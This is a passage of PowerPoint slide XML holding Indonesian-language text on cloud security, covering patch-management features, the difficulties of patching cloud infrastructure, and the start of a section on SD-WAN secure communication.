              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reguler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direncanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyulitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasarinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasarinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyulitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadwal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Akses yang Aman</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Software-Defined Wide Area Network (SD-WAN)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cabang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (WAN). Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keunggulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SD-WAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, SD-WAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
